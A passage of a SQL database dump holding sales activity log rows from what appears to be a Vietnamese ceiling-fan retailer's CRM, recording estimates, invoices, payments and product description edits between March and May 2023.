(1973, 'invoice', 272, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-03-14 14:27:08'),
(1974, 'invoice', 272, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"286\";i:1;s:12:\"5.410.000 đ\";}', '1', 'Ho Gia Phat', '2023-03-14 14:27:08'),
(1975, 'estimate', 182, 'estimate_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-03-20 17:54:12'),
(1976, 'invoice', 276, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-21 08:42:47'),
(1977, 'estimate', 183, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-03-23 15:53:13'),
(1978, 'estimate', 183, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:30:\"Bộ đèn LED Haiku  I series\";}', '18', 'Sương Võ', '2023-03-23 16:02:45'),
(1979, 'estimate', 183, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '18', 'Sương Võ', '2023-03-23 16:02:45'),
(1980, 'estimate', 184, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-03-24 10:19:09'),
(1981, 'estimate', 184, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '18', 'Sương Võ', '2023-03-24 10:47:56'),
(1982, 'invoice', 277, 'invoice_activity_created', '', '18', 'Sương Võ', '2023-03-24 10:48:30'),
(1983, 'estimate', 184, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/277\">INV-272-23</a>\";}', '18', 'Sương Võ', '2023-03-24 10:48:30'),
(1984, 'invoice', 277, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '18', 'Sương Võ', '2023-03-24 11:10:50'),
(1985, 'invoice', 277, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/289\" target=\"_blank\">#289</a>\";}', '18', 'Sương Võ', '2023-03-24 11:10:50'),
(1986, 'estimate', 185, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-03-26 16:03:31'),
(1987, 'invoice', 278, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-03-26 16:03:49'),
(1988, 'estimate', 185, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/278\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2023-03-26 16:03:49'),
(1989, 'invoice', 278, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"15\";}', '1', 'Ho Gia Phat', '2023-03-26 16:04:00'),
(1990, 'invoice', 279, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-03-28 17:24:40'),
(1991, 'invoice', 279, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:77:\"Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k<br />\r\n<br />\r\n\";i:1;s:61:\"Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-03-28 17:25:21'),
(1992, 'estimate', 186, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-03-31 10:06:16'),
(1993, 'estimate', 186, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-03-31 10:06:57'),
(1994, 'estimate', 187, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-03-31 11:31:57'),
(1995, 'estimate', 188, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-03-31 14:49:06'),
(1996, 'estimate', 188, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:134:\"Số cánh: 7 cánh, Aluminum<br />\r\nWeight: 16kg<br />\r\nNoise: &lt;35 dB<br />\r\nSpeed: 130 RPM<br />\r\nPower source: 220-240 V<br />\r\n\";i:1;s:121:\"Số cánh: 7 cánh, Aluminum\r\nWeight: 16kg\r\nCông suất: 72W\r\nNoise: &lt;35 dB\r\nSpeed: 130 RPM\r\nPower source: 220-240 V\";}', '17', 'Loan Nguyễn', '2023-03-31 14:50:27'),
(1997, 'invoice', 269, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-04-01 01:00:02'),
(1998, 'estimate', 189, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 09:19:36'),
(1999, 'invoice', 280, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 09:20:35'),
(2000, 'estimate', 189, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/280\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:20:35'),
(2001, 'invoice', 280, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:21:21'),
(2002, 'invoice', 280, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"135.300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/290\" target=\"_blank\">#290</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:21:21'),
(2003, 'estimate', 190, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 09:27:07'),
(2004, 'invoice', 281, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 09:27:10'),
(2005, 'estimate', 190, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/281\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:27:10'),
(2006, 'invoice', 281, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:28:01'),
(2007, 'invoice', 281, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"115.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/291\" target=\"_blank\">#291</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:28:01'),
(2008, 'invoice', 272, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:34:19'),
(2009, 'invoice', 272, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.410.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/292\" target=\"_blank\">#292</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 09:34:19'),
(2010, 'estimate', 188, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:52:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m\";i:1;s:53:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m5\";}', '17', 'Loan Nguyễn', '2023-04-01 09:58:08'),
(2011, 'estimate', 188, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:151:\"Số cánh: 7 cánh, Aluminum<br />\r\nWeight: 16kg<br />\r\nCông suất: 72W<br />\r\nNoise: &lt;35 dB<br />\r\nSpeed: 130 RPM<br />\r\nPower source: 220-240 V\";i:1;s:120:\"Số cánh: 7 cánh, Aluminum\r\nWeight: 18kg\r\nCông suất: 84W\r\nNoise: &lt;35 dB\r\nSpeed: 95 RPM\r\nPower source: 220-240 V\";}', '17', 'Loan Nguyễn', '2023-04-01 09:58:08'),
(2012, 'estimate', 188, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:43:\"Gồm giây điện 5m và Ống ruột gà\";}', '17', 'Loan Nguyễn', '2023-04-01 10:08:20'),
(2013, 'invoice', 282, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 10:08:24'),
(2014, 'estimate', 188, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/282\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 10:08:24'),
(2015, 'invoice', 282, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2023-04-01 10:08:48'),
(2016, 'invoice', 282, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-01 10:08:52'),
(2017, 'invoice', 282, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-04-01 10:08:52'),
(2018, 'invoice', 282, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:43:\"Gồm giây điện 5m và Ống ruột gà\";i:1;s:42:\"Gồm dây điện 5m và Ống ruột gà\";}', '17', 'Loan Nguyễn', '2023-04-01 11:56:24'),
(2019, 'estimate', 191, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 17:43:11'),
(2020, 'estimate', 191, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-04-01 17:43:43'),
(2021, 'estimate', 191, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:40:\"Chưa bao gồm dây điện và nguồn\";}', '17', 'Loan Nguyễn', '2023-04-01 17:43:43'),
(2022, 'invoice', 283, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-04-01 17:43:49'),
(2023, 'estimate', 191, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/283\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-04-01 17:43:49'),
(2024, 'invoice', 283, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"20\";}', '17', 'Loan Nguyễn', '2023-04-01 17:45:09'),
(2025, 'invoice', 283, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-01 17:45:13'),
(2026, 'invoice', 283, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-04-01 17:45:13'),
(2027, 'invoice', 270, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-04-02 01:00:02'),
(2028, 'invoice', 271, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-04-02 01:00:02'),
(2029, 'invoice', 283, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:10:\"1000000.00\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-02 08:28:41'),
(2030, 'invoice', 283, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:40:\"Chưa bao gồm dây điện và nguồn\";i:1;s:82:\"Đã bao gồm dây điện và nguồn\r\nChi phí gia cố lại trần: 300.000đ\";}', '17', 'Loan Nguyễn', '2023-04-03 09:13:46'),
(2031, 'invoice', 283, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"1000000.00\";i:1;s:10:\"1300000.00\";}', '17', 'Loan Nguyễn', '2023-04-03 09:13:46'),
(2032, 'estimate', 192, 'estimate_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-03 12:54:10'),
(2033, 'invoice', 284, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-03 13:14:59'),
(2034, 'estimate', 192, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/284\">INV-278-23</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-03 13:14:59'),
(2035, 'invoice', 284, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-03 17:11:02'),
(2036, 'estimate', 193, 'estimate_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-04 09:12:40'),
(2037, 'invoice', 285, 'invoice_activity_created', '', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-04 09:12:58'),
(2038, 'estimate', 193, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/285\">INV-279-23</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-04 09:12:58'),
(2039, 'invoice', 285, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-04 13:51:30'),
(2040, 'invoice', 285, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/293\" target=\"_blank\">#293</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-04 13:51:30'),
(2041, 'invoice', 283, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-07 09:29:03'),
(2042, 'invoice', 283, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.820.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/294\" target=\"_blank\">#294</a>\";}', '17', 'Loan Nguyễn', '2023-04-07 09:29:03'),
(2043, 'invoice', 282, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-07 09:29:26'),
(2044, 'invoice', 282, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"28.840.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/295\" target=\"_blank\">#295</a>\";}', '17', 'Loan Nguyễn', '2023-04-07 09:29:26'),
(2045, 'estimate', 194, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-04-07 14:25:34'),
(2046, 'estimate', 194, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-04-07 14:25:53'),
(2047, 'invoice', 284, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-08 15:20:18');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(2048, 'invoice', 284, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.400.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/296\" target=\"_blank\">#296</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-08 15:20:18'),
(2049, 'invoice', 279, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-08 15:20:51'),
(2050, 'invoice', 279, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/297\" target=\"_blank\">#297</a>\";}', '9', 'Kỹ Thuật HGP | Tổ chức đào tạo WIT', '2023-04-08 15:20:51'),
(2051, 'invoice', 275, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-04-11 01:00:01'),
(2052, 'estimate', 194, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-04-15 01:00:03'),
(2053, 'invoice', 286, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-15 14:16:42'),
(2054, 'invoice', 286, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-04-15 14:16:42'),
(2055, 'invoice', 286, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood\";i:1;s:4:\"1.00\";i:2;s:4:\"6.00\";}', '17', 'Loan Nguyễn', '2023-04-15 14:17:56'),
(2056, 'estimate', 195, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-04-15 14:33:16'),
(2057, 'invoice', 287, 'invoice_activity_created', '', '18', 'Sương Võ', '2023-04-15 14:58:22'),
(2058, 'estimate', 195, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/287\">INV-DRAFT</a>\";}', '18', 'Sương Võ', '2023-04-15 14:58:22'),
(2059, 'invoice', 287, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Sương Võ', '2023-04-15 15:57:39'),
(2060, 'invoice', 287, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.270.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/298\" target=\"_blank\">#298</a>\";}', '18', 'Sương Võ', '2023-04-15 15:57:39'),
(2061, 'invoice', 140, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-04-18 07:18:17'),
(2062, 'invoice', 140, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"338.892.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/299\" target=\"_blank\">#299</a>\";}', '1', 'Ho Gia Phat', '2023-04-18 07:18:17'),
(2063, 'invoice', 142, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-04-18 07:18:49'),
(2064, 'invoice', 142, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"89.712.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/300\" target=\"_blank\">#300</a>\";}', '1', 'Ho Gia Phat', '2023-04-18 07:18:49'),
(2065, 'invoice', 271, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-04-18 07:19:33'),
(2066, 'invoice', 271, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-04-18 07:19:40'),
(2067, 'invoice', 271, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-04-18 07:19:44'),
(2068, 'estimate', 196, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-04-18 09:26:08'),
(2069, 'invoice', 288, 'invoice_activity_created', '', '18', 'Sương Võ', '2023-04-18 09:26:16'),
(2070, 'estimate', 196, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/288\">INV-282-23</a>\";}', '18', 'Sương Võ', '2023-04-18 09:26:16'),
(2071, 'invoice', 289, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-04-20 16:56:53'),
(2072, 'invoice', 288, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-04-20 16:57:36'),
(2073, 'invoice', 288, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.080.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/301\" target=\"_blank\">#301</a>\";}', '1', 'Ho Gia Phat', '2023-04-20 16:57:36'),
(2074, 'invoice', 276, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-04-21 01:00:01'),
(2075, 'invoice', 268, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"500000.00\";i:1;s:9:\"350000.00\";}', '17', 'Loan Nguyễn', '2023-04-25 11:09:11'),
(2076, 'invoice', 268, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-04-25 11:09:48'),
(2077, 'invoice', 268, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"29.025.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/302\" target=\"_blank\">#302</a>\";}', '17', 'Loan Nguyễn', '2023-04-25 11:09:48'),
(2078, 'estimate', 197, 'estimate_activity_created', '', '18', 'Sương Võ', '2023-04-25 15:11:48'),
(2079, 'invoice', 290, 'invoice_activity_created', '', '18', 'Sương Võ', '2023-04-25 15:13:24'),
(2080, 'estimate', 197, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/290\">INV-DRAFT</a>\";}', '18', 'Sương Võ', '2023-04-25 15:13:24'),
(2081, 'invoice', 290, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '18', 'Sương Võ', '2023-04-25 15:14:21'),
(2082, 'invoice', 290, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"16.260.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/303\" target=\"_blank\">#303</a>\";}', '18', 'Sương Võ', '2023-04-25 15:14:21'),
(2083, 'invoice', 290, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:320:\"Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";i:1;s:285:\"Sải cánh 112cm (44 inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: Đen\r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";}', '18', 'Sương Võ', '2023-04-25 15:30:46'),
(2084, 'invoice', 215, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:49:\"Bộ đèn LED Haiku - H Series - 006580 (Indoor)\";}', '1', 'Ho Gia Phat', '2023-05-05 14:20:41'),
(2085, 'invoice', 215, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-05-05 14:20:59'),
(2086, 'invoice', 215, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"172.830.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/304\" target=\"_blank\">#304</a>\";}', '1', 'Ho Gia Phat', '2023-05-05 14:20:59'),
(2087, 'estimate', 198, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-05-10 10:55:01'),
(2088, 'estimate', 198, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-05-10 10:55:08'),
(2089, 'estimate', 199, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-05-10 11:56:59'),
(2090, 'estimate', 199, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:53:\"Nhân công lắp đặt quạt trần công nghiệp\";}', '17', 'Loan Nguyễn', '2023-05-11 12:09:36'),
(2091, 'estimate', 199, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:63:\"Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3\";}', '17', 'Loan Nguyễn', '2023-05-11 12:09:36'),
(2092, 'estimate', 199, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:52:\"Quạt trần cánh lớn Powerful S1 sải cánh 3m\";}', '17', 'Loan Nguyễn', '2023-05-11 12:09:36'),
(2093, 'estimate', 200, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-05-12 14:09:56'),
(2094, 'estimate', 200, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-05-12 14:10:23'),
(2095, 'invoice', 291, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-05-13 10:12:48'),
(2096, 'estimate', 199, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/291\">INV-285-23</a>\";}', '1', 'Ho Gia Phat', '2023-05-13 10:12:48'),
(2097, 'invoice', 291, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-05-13 10:12:56'),
(2098, 'invoice', 291, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"81.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/305\" target=\"_blank\">#305</a>\";}', '1', 'Ho Gia Phat', '2023-05-13 10:12:56'),
(2099, 'invoice', 292, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-05-13 12:08:11'),
(2100, 'estimate', 200, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/292\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-05-13 12:08:11'),
(2101, 'invoice', 292, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-05-13 12:08:19'),
(2102, 'invoice', 292, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-05-13 12:08:19'),
